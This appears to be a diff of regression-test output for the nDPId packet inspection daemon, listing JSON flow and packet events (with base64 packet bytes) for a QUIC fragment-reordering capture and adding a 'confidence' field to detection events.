 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1621498081522,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621498081522,"pkt":"AAAAAAAAAAQA8lpWCABFAAViYQ5AAH4RYvGfdbB8xkodT+8SAbsFTkZmwf8AAB0ItDBJ3NIuqUkAAEU0zVGaIK6UyDHeyNAcp56wwNTOdBKN2bGwgH3tSTiVxSqi5R4I7f3uL1yCaFlIdaYH9ahQKvndRKo\/ujk3\/jxfEcgto9i3futX9okj4XQ27PcefMGWgXqyEVg4FX77CSecDnTaNTLYfhgkDYQuCO970H4hixxovH+9p7Rv9dvjx2i\/DEJUGfnU896aVLuBnPuODO552k7IJaY3oWgEK0rlPQEiGu8iNHDYQvoHxEBatHMnsyOw8Zigvseo1jujk6RJI1A1aOg7YO9cAhzx\/u6chL22xzxaN0rZh\/N0XhIF0NwNbCTSv0YxaADYXS+ZMZCfG7i\/c1SF\/TLgIw2\/Cpu3F3+\/J3snQsx2Ypa323eXtmuMVPdZd7ZS0JAerklF6xQ2sS1MAkHYoaZwJeMEuKsLN21trT43ZhRptSf2u\/vwUGzprigY38cgmz2P0F11GVoj57z4wh7UcQjKtTWJ2849\/MydU8igJwJBLHMPRTXx3H\/BMY\/XLs5QxfEEe2tglHiHmbbq4PzWF3eT6ivMr1fu4KfSTFrTevi80ysJLj74VjHcpduKqVQEAr3Nrxo29\/LtT2\/2SjRuE1\/QZ3jNaoc+VKacJ1OxFmMjy6MGm5g4zuGOU4PfB50I\/VqTXCdTlUAmTY7aw9cTfWQym2+3JjrSCgWg2UbNSgsB3L2is4KZ\/0e1da4EhbjUCPTE2G4aoj83FMSovFWop7f5UAVm40K7Ty5x83R2EbPCd85UuGSIQ2TY5rEz31oaGw7pNUiRlzOkMPY\/3kFEfS4kT75iAaOiXzSFUXwVh+46V1ZvA3YWe8YCrMaHZgPxkOMYQixK5m4kE4DpD+kTtbvG+rGsitiIx92TiXWXi\/RueKekCBAIO6DDqnNSDioHQ1qgtwcpgfVl0ej2qxMeg3DrsiZDxeOV77mCA0L84J68iQzb1jxQzp5GdP+Apo6zOF9Td3oDYFxp1\/2YnjbYkDZQumseur2wImpbnrAdoRFORnbxALxWRA1dZjITPJHmekQRA4kxEp7\/Z97odl+ObDogC\/\/cAhnq4DfOJz00T4RdEcO081yUNcS\/FEvbg7B9sbjDCedDS\/stwrNGitySwmE3scR+aZKyKBtqHCMiWVQOhXlWVUJyKHlfU1lb6W5mDBMyxAaJZZTfI8GB+zZV2rexPCKIqBy5N0iq6rwIiMUn5CKijk2bKXIzCqSDbqrJxJnrHf0vns3v74qpefAZDni0SOFc+2DykFX6NEtdNgoW92KE\/mvxeaIXMyLuEr1rBY8P21x+u9Hj4lI28mV2TP+OvII1F78tH5muJnBp38Ls4t00WNUM5qvDRCPn\/qCJOJupXtqxmax1I5E+sxFqbI2+QyiNd1xNWeS7bPXPPjVGS6cu9MwsecO+R9Qv\/1VhgxscP2kZ797YzaYhjw8bmnZS2O1uUm9CvlrYQdUxSRwLgY\/jIY2w8pvuF\/hO7kVAMYVHGPH+IQO1SY77GbyF4u4k4xFwBDkhIKR\/nOX3lmm4FtHy0hlq\/6nXLfGvIypcoaMaaBFB9hx0m5XnnTxSnIC1vhW1FDclKSyzUy\/ddRX22aL8vOR30NpJH4RlJ6ueGVM641FEst\/rh1nK6cglWyn3\/dXRMIw7QDsXh1ijz9s95X0SsUD8hNmRuTzlhnVPs0rxOtkDr0ojHFIvCB+gp4SNVj0YldDojIlR0\/3Dn7VAGDCem9vEBUBT2YeMkbsNoFcGF9yx+tHZxAZUN6i3I67NHiOw\/T+jxUqj\/K95lSH+zdgQfLf1aBtau7gu"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498081522,"flow_last_seen":1621498081522,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498081522,"flow_last_seen":1621498081522,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1621498081821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621498081821,"pkt":"AAAAAAAAAAQA8lpWCABFAAViYRtAAH4RYuSfdbB8xkodT+8SAbsFTm91w\/8AAB0ItDBJ3NIuqUkAAEU0OvufirbIDgp026bZbyRK+lP\/li5aeFJuMGsrKstuy5GNC2z4iOO\/abPbTq2u7PrmN1s1F6w0IR63u9BJRRqZsjR9rWd14KbZN92cuC6PwQZASSZ0PWLjMgW8lo8bo\/p4Ie0KGPVmarivxVc7f2b8bWK4ukJRx+v403t\/9CEnqZ+h1nQX3cV0q0wYsDcL4t89rZdkOD\/2h3Tynd0mKl+EfWaCiGCWZTFea00jKZkzOYtci+ntlHZ3vN\/5QVk+nvgSVijNAivrMJEWbvt\/Hgl\/NDn711tOaolOUN7VDWPKhmxO5E+Vj5qkX1JuMR3poM+ZzVmshiDYUYmCOo1\/EPh7BUBA8amQA2Pt5V1UAhZ6l6otPDcgPLAghQgMXkuAiTtWFzpRy1PsfSTGti0hwoBRmXcX4Osy85gPdkMPPjDRL9sxMWZ443WQaNmLu2NCZG76oV8Q9r6elrs8nfp6cokfwyjQiaj5lXdtmWez6Ub9zZ3hVLN4ZSFJ12MzBDXFLF17wXLFQVEwN3J0hUvUhKsfZyTSVGXukr50e1LIUe5Vk3iGcV5os3CuVaG91MxXzApOzbVLLESlpzPGauzkLFu+7wEmphQ8EOGPzSKcgPkIYTuk7\/p1\/qR+e\/LIKLwmFLece51gXCJDFQ9PjUsal8fhmjAQtOvr6WTWXLColGnpvdaMDuQKB8HjmmpR9dJ4DqjExdn9ISewALk8HydNfk8Uvr3B+OVq71nszG8nTFPdSYSBzEWhRglIanWym5rO+STC\/8vTv\/W6q2hhkLWj1q0jtPjwAN\/v2Y+D0A4JyNLo2FkyIJcbWfplQ39A3\/xuxD3YAD12Vn57SeHhSWxO1uApQ+t+zJkEVcrhY9SKtmNwQm+6eVRxYFVqew4rn9K7lyAryiVHDQMrxz5ZBAq541Ty6HHtPWBecGy6gvo\/iT+yBnUFd6REWeOOlZ0VTsR\/AFub95hlY44g8UyeLChHkWygL0G4vYgPCQgWNuZWs1f3PFB3C1r\/neQaHWsEqXfzcFPI1Ve77J+5BsBQx73by2L8lYfyixggOPo7sTcoKYKSodtv9pgExVr24O4\/8tkR+15ZqhYeGxR91PaYugbzj67u+4OLdjdufEwK1FjqMmXfKMkZZSRgMY25aCKP6w9RpGPzU6xtd6n8eBrjegOuQMY2i7GThrYUeYiCj24dBR+A\/nS9Z4ny1MZWcp0jfK4ALWIdHAvCMvFkaEoCrswCG3q2FGMP67Qn27U7Cgdy6Ae8bOKa0gpwD67XIbZ3VnJtIZI7zP+FEhfUi0Yu6AMqmlLsv6OXFjKd16nwj\/J9CUoCsvFZj7Ux\/GRuDCul1XmrxN7CCNOU9OX+ADt2L\/fQyWzOZSvKiBhqpBtkk2TfqvuCvxVhzPhUfxCU++aidWCrZQZzSrwuajKW3QvMvG5Ss7lOXFiKY6un0x+VvjFLGtGPVVsETZAhpkxfy9vVl7cTojfKYb9BYI3it8kRtXGrW\/xIOQ9niF4V1PDpiubAYqMeNRlI3NLhOOvjMSc4gQyVKtScIYXdhvVAZtuM9Yabsw9P+8B5XyWEuXXKfq2yxLzBNvM0uXuRSEoFhzdgUADAIq7QcGiDu8G3IbB0DnhTLfiqNJcrjj5j8Y4Xh8KAEXft93SE+XzT7U\/L3dHtIrBdUdCUjN1yTskCC97fkKUSEv2nRSFu33ULAhr8XAIBTeRzax6cVNbIQtbTQqO2neCBmpL85f0DISj7eIkl89oCYMp+ZXfxIpCUVAU0uyKjoKpFGrNC11tb"}
 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":1621498082422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621498082422,"pkt":"AAAAAAAAAAQA8lpWCABFAAViYRxAAH4RYuOfdbB8xkodT+8SAbsFTriWyf8AAB0ItDBJ3NIuqUkAAEU0gEWSz79hSjx066IgEUilTttXNnBdxCIzGwyKgx22yggjYxUTOdMajr1\/eFj84LW0tWwiYEddNG1hbcYuTsjgufILsroj24Q3t\/uzrvR4hxlGIipIFKFQSdDIGcYBqlNqAaUOXFFDKWM\/NJ506Je2fGuUskxDQKAKr93NLTfrtVPjcaeEjkYt31c\/SZTL75GuaPT2mMN7etsFLArPTUK71+1V1afZAZptJCfmKCNVqwgGuD2i6NTmwkVh1735B38SS9NeTwvibpCCgqWLwGQceudYrYixpQsp4ysYS8hpI\/FAn\/wMbNYfLg0ULXfgBbdtqpqAz8gzjz6eyl\/Rpj5MNvbZVqNxScGru+OBXQwtVEZhxEtA00gRt2yig8vtLXbxeTHNHLvc1tr8ADnBwAus7BUb8Elx\/8QbOQJikFJzSqgm1q4x4Io\/yzHxvAmLnPsiEQqTqREOrKHfmlEHcPkGVkGtxFBNN+2k9aZL5JbmPRlBlC0G63qLufVXOEoqfGJNMZ\/r7nslJeVC3RVHNHRsnQaaVqTKCmjWU\/y1v6+B27XHPLKXFcBZGuXpvfdMRAsvAkwRzf8W8dO1sAukMkeYXN0V0P\/cdEmXv\/Mltpa5lcfPfiRw+bcfRkuNSD7Jc2b+iebax5ug8xwzr02wcXcQF4cGzsQyRZl7DyqI4QU91QrAsEcoHNeRg5JB1T9kQFDdcX\/REgLdvgMgBzxehG7z9OVH69vE5OHzw7pvnkoKe6J1pspEyN\/MZnsAVzaytYx30UuiyRgMISQWN1xfqum7\/YAiZINczHJ8y57E0O2FZW\/YNr4IpADWEzCYwTIu0x3DfRnVNbEZaadYGhViYNEY1zM28\/67i0wKSSLdh+0hygO1BEurBhEzdIroBw1lBfGNyfblV6uG\/7uEn55zpbG\/7qCk0ktkqTFveb6WXCOISST2J32xBVGziVeJsWONMPJ8Jm9PT1AEZcJwaHejFt9DpalZhmwFO8Enc\/ogZQaBxWPbFFyyuh9rvm6tNvA3jaeVh40hlLlIMUxPLddroFwYb\/9EO2mIWdQrHAdGk1Lh6AyJa6YfJKwGpm9NYCxghscJLthycNymVYnlH9ylQDmgmJl7hvnLAvwa32EnPRpWHAkiUhu0kcIqcpT2SkZyiu4cMABsnU3jPWri5+i7YqqcU8clEZP79ilHPctQYpBtvEKAmSD7Gg6PfMEKZqwwpeUK8+dTYIp\/o\/SmoPxYAZFC32OjsVAjSgBTgUFjJQtKJNO\/Q0n0\/Bx7FI53Bh8tOLKaMneKlT+LrkWYQa2IgT0Ubj9l8leMgakA+hFRx5nhKVT+gHy8BijJa8hM45tbFLGLuaHb+CeAqgmE\/m8Ud4ovePpufZDd3bW0o1jrz4rn0BX8tIkQy+IUYoxrBjuExnNvs4TRwyfTblAI\/I31W8aDB662jJlcg\/QE3btTahMgEReMXljoY\/ZRh3u7JIQ6wjk22ntsR1sJRh2WFJh9oJxWsj2DyGf96xBV4z\/aPhEV\/yote5aKxrDNBeQknvp7Yhfy4En1FEvSZe8rUAbBQgDc1BHXrROj+FBZqKGH6sdegaKRirXJnQLUtUJ\/Q5NaDydpZmdgBmsplWOT\/sTyUwVugBQNQqk6\/7I37T4YBTN8nQWspDxdmEOSVvcWwSS7UJNsfcrNGCZpeXaEIJv\/\/lt\/H8+PibZ7H26DpmjUL7J1pXuNg9btTIv8GIPiixqfenNc2qdVBe95VLeHtbRIWFOipebc7xvKSmtYEtFRjvJuANVxLMqf"}
 00630{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621498081522,"flow_last_seen":1621498083623,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498212950,"flow_last_seen":1621498212950,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1621498212950,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621498212950,"pkt":"AAAAAAAAAAQAR+RbCABFAAViDdxAAH4RAMSfdbB8gPgYAcFxAbsFTooVwf8AAB0I+oTf3zKXQjsAAEU0K2X81CUUYVNTb7c\/gt6K92g3k2uie+OA53gIgfaMNjNuH4MUMelKU6Fsw6sNfg5GG5qJ4eud2MFOn8X2tXhI8359esLfPp9WmlTfT\/oOrLme3MuOolugSEKcrrCVkd0LZuV6Av8DKVlHVrlpv0240Nf37vxag6C53FBDIOQ6LCd22JO5xn\/NaFOQBTN5MwhdXKe8H6r+EKu0MMl3i18CTaxer4Ec7N0oGrRomY7+OmgBg9TauzdMWJj0eYJFpdct9mnNghVe3E+WWeOHpf3NCjtkwso9os\/I1QOoZPXB9jwIdZ4Ne8+CuKTG+9tcqCFaaYPOS5DhXjQFlTS5J\/C8wry9mRLfPxmO1BQiHAFr6GP9Y5vWBsO1V2479WWJiBEJug410DZ3eaQ6ykeEHvnIbiMvMtSdXEZttkVySMQ31Fw9rOzeUgG+BPr2jhdWKXNu3NdlWiImj8cTTjQOxOtPhe\/+6Fx3ryMD+9KP13OjJpbH1TmVC3+wAJCtRp7htijDfs+djtrDtQtmYoljdKd6zc7r4DUgUx5a+lfJ+CQXmVSyc22sQwHuhLv4tZCwLDzjsfyd0tH+hoD7Qa72Swsvd9iN8a6VR5VOVL4dEXew+OVA9WCef4VgLk3PIXZKixpDLfYCSJ\/KS3IM1J4\/k8MH5DuYEu14a4bhYLVMzA+\/6Hh+TKT4leprgFJ91woRA3ZcHSFAFDQ6JNfWusZkMrX0kYWHzOn9N74ryBahTJAqZOQDKe7hgPc1zvzFZdQI\/CliH1lyvZkKhGurs+S8SAvkW327v1xIJ3a4v+knVz1HDiu9E8EjgQkT7KRHRIBqqKZ4ondbPabBq7uV6zq471LYqxhGKFGyoGxBVzr2DttB3Z3\/pwDEIs07QNSxcUKBzdZnJ6x2Fq+YkehrvOFCXOy3YCMutFzVwvOnQCidL8ohHIIWEgjIbGLfpHm\/0aWrklIqjrJSJ+rTPRW83W61p44YDEYx\/ac\/msD0XGRhWnBmicJsTwRBBV5svGieLeU0wwoRv\/LHI4mThjAG6AiLpvJ81A8npvcEWQ+MjQOgMjWQq72fQ6mncpsEh8naywuNoXmsIk4BB4ZGwmYN2ud9\/oZeqWqvV2B0k5gYpBOaiO5AHqvzEZdSTEayKAQ1YqXbuCf5QNmeckJiVyF6qNBoatmRZcQSwcZ\/T2ApNAyCKTurIastl6KeRV4+KqYzamhQB2W0\/ku7l9R8YLUGXIpbFAVZ0uF0OZyLqs\/v177JsDndRPefW+Nou62dLsU9VVlluBk+YGFmAONdyhN8iZeA5WCOwz3iTTD5N2bN8mMzQIgg7Bqo\/E8GIRug9o17TbkJUN0YnjfCIbHJtKaMHxL00NJbr3VzPT+M6M9yFXdxFqcigT0A\/lSoDVW1cjJ+LLyxe7NFjRQd0WXacjomlU\/vSqOt4d7QZrZUGLTeRU+r2gGG87IsvBtKso3QQR3flphwZgK4qieVr6KE53k\/ITHpCwbcQAfeWsRIfVZj5YsjA9TaaJLxpay1HiqTxUqZg3plTLPwXIAI2UEnJyFqlp3LNmknoPjV\/RJb\/wzVE1l\/2TAXdCsnVW4\/RvYAIgz1kbEyY+mdBPPmN7r0m+q1IFeOg5RTG+Hz1u5FTDjQLy9DaHat63UbFT45W72CQGLR1YbL59Rzmw7wT02BDrbjYMG5D9ap\/FxMB4LpXzY4OpaSIPgoD0IgD6kheO9CqpcZaNN6hMfIgQu+UTF39\/ec6XrRl9w5Mu88X6Qox2mOpT9nNb4CbMfitF4Z"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498212950,"flow_last_seen":1621498212950,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498212950,"flow_last_seen":1621498212950,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1621498213250,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621498213250,"pkt":"AAAAAAAAAAQAR+RbCABFAAViDd1AAH4RAMOfdbB8gPgYAcFxAbsFTulVxv8AAB0I+oTf3zKXQjsAAEU0+eG2aeYr2ZwxMQeoNxrRVbNbZLWTAPBIHGmzPrHj\/mbYKL9ixyzcBxmQnCXQO1lDY0ds2+Uxd8ptUf0B8IEyK6HWt7XDMsSm0czLAJJ5gHVvFp4WvT2QOxWF9qk9uhVnOEbnpLXsHxpRz\/dz0mNah\/t9a+nz9avu0o52y0QKIy8LvNVm5rColse28vLMEqwFt8Yhb0a+e8F1WQ2Jog1lBFaxZ9C2nVaxdCT6fJgVQ6neO3NzPAYvQeMe31c7fRAOphOfBUEujT4YzhvNiFl\/wwufDbC02lbS32wQDoSwANLD4ijQelHtGYhgR48L98xirGA5IPv0nFtZ1GWdgn333AjOEIFGx3pnnuYgw2iuWo3m3sof14XdX\/TJRFaZuHV1ez9+gI2LSQdjuDaB+lcNc3pexpckY\/HKHazTzKBQe+fUELgAOI36zu7bwfiGs1DcCvWMT+vwQrQ74Yw8jk4Z4SiCS7DRZyln0DpQKDMsVHuAt0JxYrc8EmeYHpAa\/WU7imzzrVyCMqw87RX13BgCI3YyigtKRpDM25QuBSbMZz5ZYeiWXPyE1k+Y7t4UwBli+J1tJgOZYuGdHdpf4dfCgKgBpCB\/sV\/ZjdtG221HiWUjAFU\/RX+F4Sk2nlwgBk3Gu4HyZl\/faOlZ4A1OSdQ+fFuezBbnSGeaqbNo8VqozC+DV5QFVDR+iO+QWF73iaPEDFOX3fumQIGEeMxUCKQDbM3wtercBjGaPrgwSioQrTtGhXuk2URGocylTgSwqUuBqVOiZ6JtnYXVCLz0j3YmG54CGZRJwD6Hdzt9JYrpmq6dmeqLlnGt1boRR50qkJxmjqBOKv7Cl58UXZpi3hAhdW0L1aeY6VfIJ1ywx4a+S3Xag\/orC91PHKrMCiRMP7BHfcAHP3cmMHXdjD7rw9txJdTGOjn8lX\/mclH9lQGLRl1v1dxB91OITgYtiPUptU\/FstAfqQUeN7VbNzZ1K7myM4eKtKPa3VKJ41NTGXaN0jRG3AsJ1FJ1VXwFsxEXvqnYXdbQvqIAtWI7ORnGc4RUiKLZMaiOQ9ZpeJBxqsAYf5Ipe46sFpXilr18+FHg4XkhotA7suHK7WRKyC96nxR2DpEVf2iW1ectFaPFEKsQ\/H1YQbyGSNOyfsPh1j7faS+9snjbmdWCAfHpAxSqQjfbmAdHw\/pXpU8QfMr7cJSolfwHDFsekvEeA7haX+xyxiOvwU0xIpKlGttzlKe9Zs+aw2lgL1+sWhZVxiXxt\/gUA3TRh0SsDzH5g+XZJd\/neVfv5Focg0swaZtgQXQlDD7IMT0JIkbpudBNxUJaoKkGBhyJSXW3YfdpVjMxqZHSyytUW2OsHTqTDxRLDFBCvuJkYPJ\/TXIpK0\/4wD4L9l0omgm3px2fr7Tg0bZjKBZqYFsrt3HkLtSGTbe9Cy8+JivD7AEnEUiKufzcgmavYoKzlmopX0FuwXrvI3Tehohc9Un3CymwmJwzoJogxWbDMhpF+zwoGBGss9an05aUuur3iz7Wxk0lUMrHG4RhjccCzdOjsiU0cpH7WOa3JeWnb8oZZ7E1yUHJnEa8TUN7DI2nHm7hd5xvO0jYRqfo5cwZY5XIuQteKO6d5vyOsi3XP6L\/1\/B2Ut2V2caOd42VO5fK9qvI\/d65vyKDadxtG52mLCNi3gzdraK+EO18KknpwVwSg5Jv0pduYOIgWdKxcr+HnXkkz+KrYNl2w\/cO6BHjE8z+P6ziiwIfrr6GWrGLS2PfoqxdL2ey08WkeqrNpvHrYQU2a4rs"}
 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1621498213850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621498213850,"pkt":"AAAAAAAAAAQAR+RbCABFAAViDd5AAH4RAMKfdbB8gPgYAcFxAbsFTsNmzf8AAB0I+oTf3zKXQjsAAEU0TYW2wa0gBSRDkkdmZJDu\/pNSjmjccl+kQig5mlxVsILRFwOMT57XuOv8+xCb+87uWA9dkR3MCory+CSA9k9IwRunZJ+BETH5SfmpqFSP\/EAiXYBfiyWfexJyvvzdDNIlmXLEiyQv4ixIWJIO3WnbJCrbDZ9yN4PPh3+ZJeKdbL3pTJsxyDYJ\/K0AwIB3uSpy2ZQ7iPtPDkHhwAm0FbglERefDANRRCDt9UuWOODuqe\/eXcYzExeuApS5d3YIK4jhh64DClYEzzb+MKIc\/xPP+Kn3lPcPwqqIF0tNqN4kidjRAQThHdN0m2oore8VMpITgbE0pV1MgkL7lfnb1BmHdqPktFFVvg4M9R9oBo\/vgEDDJRAWAmGcmVRa5lB7oAaJdxN824d+GfIw\/1qMVVQy9mbPreGNJI5FA87uOjFOg\/W5J3F1z3HhaIyqbtwEoUGiMpxMkBVwhQJI\/NqiQ7cCTPyStz3iGYjK3gR\/9Bbw8+tTw5id8ub9L1LWEZk7DqKPgXVBJu8OGwqpaRMSGddcTDBphFbTHUszReIPXXK4fIJ8vnhXIbSCNh5usnBJYxXalGGyP1OwD2a79wMSUAPRbTRq3rslV5\/OoRSqu\/Zs+8jHkIPMW4LtxNfcjjkPK2kD4PebKMCHpmd0zooX6LnokRS4M4p0k3XmNrQeH1SNO7ooZjgdGcmI2qpnjZ50wZY0FVF84zFcfhdXiDRTgFPFrSaaxPf0z8xF0n\/P2TpBv6uEkyXD2A5+IeZFJHXEf9qwaBDrm596gwBmYOilpzlnw+vM13lluTV8LOtESGS\/vKE4CpcHhAcjdbP+1ymk+om1iitfEwkvvDF1j1qafTczkx30v4HqUJUwF\/9b61fj4o\/7elbSAAzfCZ7ESTNk2A2MHuqy\/5+jrriuO72nwy6VjhJ+GulTPzobteW+l\/zBEckGEa8FJfTQdOStHqid4SXNF5RJb\/1ytpyxjnE0mVjMP42pjeQQpTUsUPMa9heF32n+XhzIkoHVuTsSW8KUDb8XsSKBKbYY1eJqV22PrlbamGDRPIeYyZxQrvseBe9ZGoW+ojFuhr345lGnNBRTbyV\/ifd+H3psrwilnpBQYZmIt3+yx5+Ox2Fl2MHXrWRMFlVHgyr3YspcY0pZlBmQSZOmPefZHN3UeMEoicflo7w5P9I2OILP+nrgTefS2ax7woPr2siuAHSliWnIFGW80aK6MX04MDmNfZ9qEi9D2uzji0WYs1aM\/FrXpTtqj1SPUWWhLEfXiBcjKNmhsqIUIEkrKDmesaaohHC3lT35CgqVB7Sitf+f3SeyMb+bWGart+IRgLgJBcEhEKoIoYkh0VLJVV9+doaDLpZ3HUz68vvJqjR7RJ0Gd5ED6cjJQuN+n45FpN9LmtbOssh2iF6qqJGi+PGx9q0M1M\/HUKAy5AN1S8YkWFsARDs59lonK62ZegV4vU1TBWQC7PGQRI84JNqfby2iYcagYspBzxJ+WakTI0qksHmy126F0+iqfIjkScGi9KPimhJZju3YFlyo6jNdjnvMmOvUUuhPQiXrORQ0r8qWWWh6tJ9HkW9sI2\/Ef1akHLftAxsOV4Tw7CFHLJLIsPfECdd0l00i7lyYzOrNaZMF3Kzp8XNi91vmLaBsXnvB9zagu0mQRRAnE0+1FdGlzcqDM+y0Fv02XWeM5LLndn5G6Ul+OdbTDl2ol0tkAwTNskAn08T2HhWOi5x48zrrAMi7Lm6AQyQ1v45a0okIW2FPRz\/fVqdN69MfaqHeQccEm1Iu"}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621498081522,"flow_last_seen":1621498083623,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621498212950,"flow_last_seen":1621498215051,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
